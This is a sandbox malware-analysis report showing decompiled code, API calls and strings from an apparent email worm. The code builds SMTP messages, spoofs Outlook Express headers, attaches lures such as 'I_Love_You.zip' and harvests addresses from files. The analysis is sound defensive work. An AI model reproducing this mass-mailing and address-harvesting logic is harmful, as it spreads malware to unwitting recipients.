GlobalFree.KERNEL32 ref: 0040667D
wsprintfA.USER32 ref: 004066DF
closesocket.WS2_32 ref: 0040671F

Part of subcall function 00406746: lstrlen.KERNEL32 ref: 00406753
Part of subcall function 00406746: send.WS2_32 ref: 00406771

closesocket.WS2_32 ref: 00406731

Strings

MIME-Version: 1.0, xrefs: 00406491
Content-Transfer-Encoding: 8bit, xrefs: 0040656A, 004066B3
Wed, xrefs: 004061FC
Content-Disposition: attachment; filename="%s", xrefs: 004065FD
Content-Transfer-Encoding: base64, xrefs: 00406621
Mon, xrefs: 004061E8
Date: %s, xrefs: 0040646D
&A$&A(&A,&A0&A4&A8&A<&A, xrefs: 004062A1
Tue, xrefs: 004061F2
Sat, xrefs: 0040621A
MAIL FROM: <%s>, xrefs: 004063A6
Content-type: Application/Octet-stream; name="%s"; type:unknown, xrefs: 004065D2
QUIT, xrefs: 00406708
--xContext--, xrefs: 00406685
RCPT TO: <%s>, xrefs: 004063D1
--xContext, xrefs: 0040651A, 004065B3
Content-type: text/plain; charset=Windows-1251, xrefs: 00406538
Sun, xrefs: 00406224
Thu, xrefs: 00406206
X-Mailer: Microsoft Outlook Express 6.00.2800.1106, xrefs: 004064D4
&A, xrefs: 00406234
., xrefs: 004066F4
TO: <%s>, xrefs: 0040643F
DATA, xrefs: 004063F5
%s, xrefs: 00406589, 004066CE
%s, %d %s %d %d:%d:%d GMT, xrefs: 004062AC
Fri, xrefs: 00406210
FROM: <%s>, xrefs: 00406414
Content-type: text/plain; charset=ISO-8859-1, xrefs: 00406552, 0040669F
HELO %s, xrefs: 00406375
Content-type: Multipart/Mixed; boundary=xContext, xrefs: 00406502
---, xrefs: 004061DE
Subject: %s, xrefs: 004064B0

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: wsprintf$FreeGlobalclosesocketlstrlen$SystemTimeconnectgethostbynamehtonsinet_addrmemsetsendsocket
String ID: --xContext--$%s$--xContext$.$ &A$ &A$&A(&A,&A0&A4&A8&A<&A$%s, %d %s %d %d:%d:%d GMT$---$Content-Disposition: attachment; filename="%s"$Content-Transfer-Encoding: 8bit$Content-Transfer-Encoding: base64$Content-type: Application/Octet-stream; name="%s"; type:unknown$Content-type: Multipart/Mixed; boundary=xContext$Content-type: text/plain; charset=ISO-8859-1$Content-type: text/plain; charset=Windows-1251$DATA$Date: %s$FROM: <%s>$Fri$HELO %s$MAIL FROM: <%s>$MIME-Version: 1.0$Mon$QUIT$RCPT TO: <%s>$Sat$Subject: %s$Sun$TO: <%s>$Thu$Tue$Wed$X-Mailer: Microsoft Outlook Express 6.00.2800.1106
API String ID: 1487464711-219272833
Opcode ID: 6e1c86fa00bcade5783fd953f324a731212507fe40bf4bab4951a549fb1a204b
Instruction ID: 6e52e2717ca3ea0a11f7245c2747809bb71ce8739c615a88298817d05e4ee505
Opcode Fuzzy Hash: 6e1c86fa00bcade5783fd953f324a731212507fe40bf4bab4951a549fb1a204b
Instruction Fuzzy Hash: 53E12BB44087118AD710AF25D68429EBBF4AF44748F02897EF8C9A7385D77CC9A4CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402288 Relevance: 79.8, APIs: 43, Strings: 10, Instructions: 346
stringsleepCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402288(void* __eax, char _a4) {
				void* _v16;
				char _v76;
				char _v188;
				char _v300;
				char _v508;
				char _v780;
				char _v812;
				char _v1068;
				int _v1072;
				signed int _v1088;
				void* _v1128;
				char _v1132;
				void* _v1136;
				int _v1140;
				intOrPtr _v1148;
				int _v1152;
				char* _v1156;
				void* _v1160;
				char* _v1164;
				void* _v1168;
				void* _v1172;
				void* _v1180;
				void* _v1188;
				void* _v1196;
				char* _v1204;
				signed int _v1208;
				char* _v1212;
				void* _t350;
				void* _t351;
				signed int _t352;
				void* _t353;
				signed int _t354;
				int _t358;
				void* _t359;
				char _t363;
				void* _t365;
				void* _t367;
				intOrPtr* _t369;
				void** _t370;
				intOrPtr* _t374;

				_v1072 = 0;
				_t363 = _a4;
				_v1132 = _t363;
				L0040C310();
				_t367 = _t365 - 0x458;
				_t358 = 0;
				if(__eax <= 0x64) {
					_t350 =  &_v1068;
					memset(_t350, 0, 0xfa);
					_v1132 = _t363;
					_v1136 = _t350;
					L0040C320();
					_t369 = _t367 - 8;
					_v1140 = "mvcsv.qyy";
					_t351 =  &_v812;
					 *_t369 = _t351;
					E00404C38();
					_v1136 = _t351;
					_v1140 = 0x104;
					 *_t369 =  &_v780;
					E00404620();
					 *_t369 = 6;
					_t352 = E00404EAE();
					 *_t369 = 6;
					_v1088 = E00404EAE();
					while(_t352 == _v1088) {
						 *_t369 = 0xa;
						Sleep(??);
						_t369 = _t369 - 4;
						 *_t369 = 6;
						_v1088 = E00404EAE();
					}
					_v1136 = 0xc8;
					_v1140 = 0;
					 *_t369 =  &_v508;
					memset(??, ??, ??);
					_v1136 = 0x64;
					_v1140 = 0;
					 *_t369 =  &_v300;
					memset(??, ??, ??);
					_v1136 = 0x64;
					_v1140 = 0;
					 *_t369 =  &_v188;
					memset(??, ??, ??);
					_t359 =  &_v76;
					asm("cld");
					memset(_t359, 0, 0xa << 2);
					_t370 = _t369 + 0xc;
					_v1140 =  *(0x40d0c4 + _t352 * 4);
					_t353 = _t359;
					 *_t370 = _t359;
					L0040C328();
					_v1148 = 0x40ed9b;
					_v1152 = _t353;
					L0040C328();
					_v1156 =  *((intOrPtr*)(0x40d0c4 + _v1088 * 4));
					_v1160 = _t353;
					L0040C328();
					_v1164 = 0x40ed9d;
					_v1168 = _t353;
					L0040C328();
					_t374 = _t370 - 0xfffffffffffffff0;
					 *_t374 = 0x12;
					_t354 = E00404EAE();
					_v1172 = 0x40eda2;
					 *_t374 =  &_v1068;
					if(strstr(??, ??) != 0) {
						 *_t374 = 8;
						_t354 = E00404EAE() + 0x12;
					}
					if(_t354 <= 0x19) {
						switch( *((intOrPtr*)(_t354 * 4 +  &M0040EE08))) {
							case 0:
								_v1172 =  *((intOrPtr*)(0x40d0e0 + _t354 * 4));
								 *_t374 =  &_v188;
								L0040C328();
								_t375 = _t374 - 8;
								 *_t375 = 8;
								_v1180 =  *((intOrPtr*)(0x40d080 + E00404EAE() * 4));
								 *_t375 =  &_v508;
								L0040C328();
								_t376 = _t375 - 8;
								 *_t376 = 2;
								_v1188 = 0x40d148[E00404EAE()];
								 *_t376 =  &_v300;
								L0040C328();
								_t374 = _t376 - 8;
								goto L31;
							case 1:
								__eax =  *0x40d150;
								_v1172 =  *0x40d150;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1180 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1188 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 2:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d154; // 0x40eb4e
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 3:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d158; // 0x40eb5f
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 4:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d15c; // 0x40eb73
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 5:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d160; // 0x40eb86
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 6:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d098; // 0x40e5e0
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 7:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d09c; // 0x40e618
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 8:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d08c; // 0x40e558
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 9:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d088; // 0x40e508
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xa:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0a0; // 0x40e64c
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								_v1188 = "admin@bigtits.com";
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xb:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(2);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xc:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1180 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1188 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0a4; // 0x40e688
								_v1196 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__edx =  &_v76;
								asm("cld");
								__ecx = 0xa;
								__eax = 0;
								__edi = __edx;
								__eax = memset(__edi, 0, 0xa << 2);
								__edi = __edi + __ecx;
								__ecx = 0;
								_v1204 = "I_Love_You.zip";
								_v1208 = __edx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xd:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1180 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1188 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0a8; // 0x40e6b2
								_v1196 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__edx =  &_v76;
								asm("cld");
								__ecx = 0xa;
								__eax = 0;
								__edi = __edx;
								__eax = memset(__edi, 0, 0xa << 2);
								__edi = __edi + __ecx;
								__ecx = 0;
								_v1204 = "Happy_birthday_to_you.zip";
								_v1208 = __edx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xe:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(2);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x16);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(4);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								_v1072 = 1;
								goto L31;
							case 0xf:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0b4; // 0x40e785
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								if(E00404EAE(2) != 0) {
									__eax = E00404EAE(0x16);
									_v1188 = __eax;
									__ebx =  &_v300;
									 *__esp = __ebx;
									L0040C328();
									__esp = __esp - 8;
									__eax = E00404EAE(4);
									_v1196 = __eax;
									 *__esp = __ebx;
									L0040C328();
									__esp = __esp - 8;
									__edx =  &_v76;
									asm("cld");
									__ecx = 0xa;
									__eax = 0;
									__edi = __edx;
									__eax = memset(__edi, 0, 0xa << 2);
									__edi = __edi + __ecx;
									__ecx = 0;
									_v1204 = 0x40ede1;
									_v1208 = __edx;
									L0040C328();
									__esp = __esp - 8;
								} else {
									__eax = E00404EAE(0x15);
									_v1188 = __eax;
									__ebx =  &_v300;
									 *__esp = __ebx;
									L0040C328();
									__esp = __esp - 8;
									__eax = E00404EAE(4);
									_v1196 = __eax;
									 *__esp = __ebx;
									L0040C328();
									__esp = __esp - 8;
									__edx =  &_v76;
									asm("cld");
									__ecx = 0xa;
									__eax = 0;
									__edi = __edx;
									__eax = memset(__edi, 0, 0xa << 2);
									__edi = __edi + __ecx;
									__ecx = 0;
									_v1204 = 0x40ede1;
									_v1208 = __edx;
									L0040C328();
									__esp = __esp - 8;
								}
								_v1212 = "mvcsvnd.qyy";
								__ebx =  &_v812;
								 *__esp = __ebx;
								__eax = E00404C38();
								_v1208 = __ebx;
								_v1212 = 0x104;
								__eax =  &_v780;
								 *__esp =  &_v780;
								__eax = E00404620();
								_v1072 = 1;
								goto L31;
							case 0x10:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0b8; // 0x40e7a0
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x16);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(4);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								_v1072 = 1;
								goto L31;
							case 0x11:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0bc; // 0x40e7cc
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d148; // 0x40eb0c
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								_v1072 = 1;
								goto L31;
							case 0x12:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0c0; // 0x40e7f1
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x16);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(4);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__edx =  &_v76;
								asm("cld");
								__ecx = 0xa;
								__eax = 0;
								__edi = __edx;
								__eax = memset(__edi, 0, 0xa << 2);
								__edi = __edi + __ecx;
								__ecx = 0;
								_v1204 = 0x40edf7;
								_v1208 = __edx;
								L0040C328();
								__esp = __esp - 8;
								_v1072 = 1;
								L31:
								while(E00404F0A(_t354, _t360) == 0) {
									 *_t374 = 0x7530;
									Sleep(??);
									_t374 = _t374 - 4;
								}
								_v1152 = _v1072;
								_v1156 =  &_v76;
								_v1160 =  &_v780;
								_v1164 =  &_v508;
								_v1168 =  &_v188;
								_v1172 =  &_v1068;
								 *_t374 =  &_v300;
								E00405EE8();
								_t358 = 0;
								goto L33;
						}
					}
					goto L31;
				}
				L33:
				return _t358;
			}

APIs

lstrlen.KERNEL32 ref: 004022A4
memset.MSVCRT ref: 004022D3
lstrcpy.KERNEL32 ref: 004022DF

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

Sleep.KERNEL32 ref: 00402346
memset.MSVCRT ref: 0040237B
memset.MSVCRT ref: 00402399
memset.MSVCRT ref: 004023B7
lstrcat.KERNEL32 ref: 004023DF
lstrcat.KERNEL32 ref: 004023F2
lstrcat.KERNEL32 ref: 0040240A
lstrcat.KERNEL32 ref: 0040241D
strstr.MSVCRT ref: 00402444
lstrcat.KERNEL32 ref: 00402482
lstrcat.KERNEL32 ref: 004024AA
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 004024D2

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Strings

X@, xrefs: 004027F4
_@, xrefs: 004025E9
N@, xrefs: 00402586
s@, xrefs: 0040264C
8@, xrefs: 004024DF
.zip, xrefs: 00402412
d, xrefs: 004023A4
@, xrefs: 004026EA
mvcsv.qyy, xrefs: 004022E7
.ru, xrefs: 00402439

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$memset$Sleeplstrlen$ConnectedCountDirectoryHandleInternetLibraryLoadModuleStateSystemTicklstrcpyrandsrandstrstr
String ID: .ru$.zip$8@$N@$X@$_@$d$mvcsv.qyy$s@$@
API String ID: 4149311011-1716888737
Opcode ID: 82a7f4e0260fffa1f0f466a90b3f801e1f1f1262122d3127c8101c14a427f6ab
Instruction ID: c4b552956d8c88359d0401bfea8a3880dfb39e4fafa2b11eb934faa6a3ed69b2
Opcode Fuzzy Hash: 82a7f4e0260fffa1f0f466a90b3f801e1f1f1262122d3127c8101c14a427f6ab
Instruction Fuzzy Hash: 27F1DBB5814304CBCB10BF75D98569DBBF0BB84304F41897EE9C8A7291EB389698CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00404F82 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 210timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00404FD9
GetTickCount.KERNEL32 ref: 00404FE1
srand.MSVCRT ref: 00404FE9
rand.MSVCRT ref: 00404FF2
GetTickCount.KERNEL32 ref: 00404FF9
srand.MSVCRT ref: 00405001
rand.MSVCRT ref: 0040500D
GetTickCount.KERNEL32 ref: 00405026
srand.MSVCRT ref: 0040502E
rand.MSVCRT ref: 00405033
GetTickCount.KERNEL32 ref: 0040504E
srand.MSVCRT ref: 00405056
rand.MSVCRT ref: 0040505B
GetTickCount.KERNEL32 ref: 00405076
srand.MSVCRT ref: 0040507E
rand.MSVCRT ref: 00405083
GetTickCount.KERNEL32 ref: 0040509E
srand.MSVCRT ref: 004050A6
rand.MSVCRT ref: 004050AB
GetTickCount.KERNEL32 ref: 004050C6
srand.MSVCRT ref: 004050CE
rand.MSVCRT ref: 004050D3
GetLocalTime.KERNEL32 ref: 004050E5
_itoa.MSVCRT ref: 00405102
rand.MSVCRT ref: 00405107
rand.MSVCRT ref: 0040513A
rand.MSVCRT ref: 00405168
rand.MSVCRT ref: 00405196
rand.MSVCRT ref: 004051C0
rand.MSVCRT ref: 004051EF

Strings

1, xrefs: 00405006
abcdefghijklmnopqrstuvwxyz, xrefs: 00404F8E

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: rand$CountTicksrand$LocalTime$_itoa
String ID: 1$abcdefghijklmnopqrstuvwxyz
API String ID: 1825045967-2454072292
Opcode ID: 4f87a31ff910bbbb76765ae44f831347ed66564e87c85ef04c6c44d63fd729d0
Instruction ID: 02076846e8c8a6e31432f83e4ba7e8d02048c9f1cba05857c09831ad89ea6e40
Opcode Fuzzy Hash: 4f87a31ff910bbbb76765ae44f831347ed66564e87c85ef04c6c44d63fd729d0
Instruction Fuzzy Hash: 05818271D10255CECB20EFFDC9855AEBBF0EF44304F04827EE884EB686E63859458B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040307E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 199
sleepfilestringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040307E(signed int __edx, char* _a4) {
				void* _v16;
				char _v236;
				char _v237;
				char _v240;
				int _v244;
				int _v248;
				char* _v268;
				int _v272;
				char* _v276;
				intOrPtr _v280;
				int _v284;
				void* __ebx;
				int _t64;
				int _t69;
				long _t71;
				int _t77;
				signed int _t80;
				signed int _t81;
				int _t83;
				int _t92;
				int _t95;
				signed int _t97;
				int _t99;
				int _t100;
				int _t101;
				int _t102;
				int _t103;
				signed int _t104;
				signed int _t107;
				long _t110;
				struct _IO_FILE* _t111;
				struct _IO_FILE* _t112;
				int* _t113;
				intOrPtr* _t114;

				_t104 = __edx;
				_v244 = 0;
				_t110 = 0;
				_t111 = fopen(_a4, 0x40efaf);
				_t64 = 0;
				if(_t111 == 0) {
					L50:
					return _t64;
				}
				while(fgetc(_t111) != 0xffffffff) {
					_v244 = _v244 + 1;
				}
				fclose(_t111);
				_t112 = fopen(_a4, 0x40efaf);
				_t64 = 0;
				if(_t112 == 0) {
					goto L50;
				}
				while(1) {
					L47:
					_t69 = fgetc(_t112);
					_t99 = _t69;
					if(_t69 == 0xffffffff || _t110 > _v244) {
						break;
					}
					if(_t99 != 0x40) {
						continue;
					}
					_t71 = ftell(_t112);
					_t8 = _t71 - 1; // -1
					_t110 = _t8;
					if(_t110 > 0) {
						_t9 = _t71 - 2; // -2
						_t110 = _t9;
					}
					fseek(_t112, _t110, 0);
					_t100 = fgetc(_t112);
					while(1) {
						_t14 = _t100 - 0x61; // -97
						_t17 = _t100 - 0x41; // -65
						_t104 = _t104 & 0xffffff00 | _t14 - 0x00000019 < 0x00000000 | _t17 & 0xffffff00 | _t17 - 0x00000019 < 0x00000000;
						if(_t104 != 0) {
							goto L11;
						}
						L15:
						_t20 = _t100 - 0x30; // -48
						_t97 = _t20;
						if(_t97 <= 9) {
							goto L11;
						}
						_t104 = _t104 & 0xffffff00 | _t100 == 0x0000005f | _t97 & 0xffffff00 | _t100 == 0x0000002d;
						if(_t104 == 0 && _t100 != 0x2e) {
							L18:
							_v248 = 0;
							while(1) {
								_t77 = fgetc(_t112);
								_t101 = _t77;
								if(_t77 == 0xffffffff) {
									break;
								}
								_t103 = 0;
								_t26 = _t101 - 0x61; // -97
								if(_t26 <= 0x19) {
									_t103 = 1;
								}
								_t27 = _t101 - 0x41; // -65
								if(_t27 <= 0x19) {
									_t103 = 1;
								}
								_t28 = _t101 - 0x30; // -48
								_t80 = _t28;
								if(_t80 <= 9) {
									_t103 = 1;
								}
								_t81 = _t80 & 0xffffff00 | _t101 == 0x0000002d;
								_t107 = _t104 & 0xffffff00 | _t101 == 0x0000005f | _t81;
								if(_t107 != 0) {
									_t103 = 1;
								}
								_t104 = _t107 & 0xffffff00 | _t101 == 0x00000040 | _t81 & 0xffffff00 | _t101 == 0x0000002e;
								if(_t104 != 0) {
									_t103 = 1;
								}
								if(_t103 == 0) {
									break;
								} else {
									_t92 = _v248;
